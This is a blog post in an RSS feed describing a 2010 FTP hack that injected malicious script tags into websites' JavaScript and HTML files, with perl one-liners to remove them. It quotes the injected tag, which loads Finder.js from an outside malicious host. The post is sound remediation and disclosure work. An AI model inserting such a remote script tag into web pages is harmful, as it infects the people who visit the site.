Everything I Like » ftp http://www.everythingilike.com You Can't Kill Happy Mon, 30 Jan 2012 16:09:55 +0000 en hourly 1 http://wordpress.org/?v=3.2.1 RoundStorm FTP Hack – Solution http://www.everythingilike.com/roundstorm-ftp-hack-solution http://www.everythingilike.com/roundstorm-ftp-hack-solution#comments Wed, 14 Jul 2010 15:57:29 +0000 The Tick http://www.everythingilike.com/?p=791 This past weekend a few of my FTP accounts got hacked via a Java virus that is being spread via roundstorm.com, I posted some more info and a fix below.

The following code was being injected into all Javascript files found via FTP.

 

document.write(''); All index/home/footer & header HTML files had this code [...]]]>

This past weekend a few of my FTP accounts got hacked via a Java virus that is being spread via roundstorm.com, I posted some more info and a fix below.

  • The following code was being injected into all Javascript files found via FTP.

     

    document.write('');
  • All index/home/footer & header HTML files had this code

     

    <script src="http://roundstorm.com:8080/Finder.js" type="text/javascript"><!--mce:0--></script><br /><!--4561fc54d91b71ee303e54dd3da18ccf-->

  • Solution

    Via shell access to your server you can run the following command:

    perl -pi -w -e 's/(\n?)( ?)document.write.*ipt&gt;.\);/ /g' `grep -ril roundstorm *`<br />perl -pi -w -e 's/.*roundstorm.*|.*4561fc54d91b71ee303e54dd3da18ccf.*/ /g' `grep -ril 4561fc54d91b71ee303e54dd3da18ccf *`<br />

    NOTE Replace the unique identifier on the last line from “4561fc54d91b71ee303e54dd3da18ccf” to whatever is found in your html files. This command basically searches all files for the unique roundstorm identifier and removes it. This ID is going to be different for each FTP account that has been hacked.

    This command finds all files infected with the roundstorm hack and remove the infected code.

    After you clean up the files run a virus clean up on your computer. I used malwarebytes. Also remember to upadate all your FTP PASSWORDS and DO NOT save any FTP information on your FTP Client.

There is also another blogger reporting the same hack here: http://wpguru.co.uk/2010/07/the-drunkjeans-com-wordpress-hack-and-how-to-get-rid-of-it/

UPDATE: 07/21/2010
Other solutions:

  • Restore a backup of the site. If you have cPanel or Plesk this should be easy.
  • If your site is in a version control system you can simply revert all changed files.
  • Nick, from our comments area below, suggested a PHP script would be more helpful for those users who do not have shell access. Let me know via the comments area if this is in high demand, I can probably devote some time to creating a script this week.

For any questions regarding this post contact us at http://tritonweb.com/contact.php

Leave a comment if you found this useful!

]]> http://www.everythingilike.com/roundstorm-ftp-hack-solution/feed 10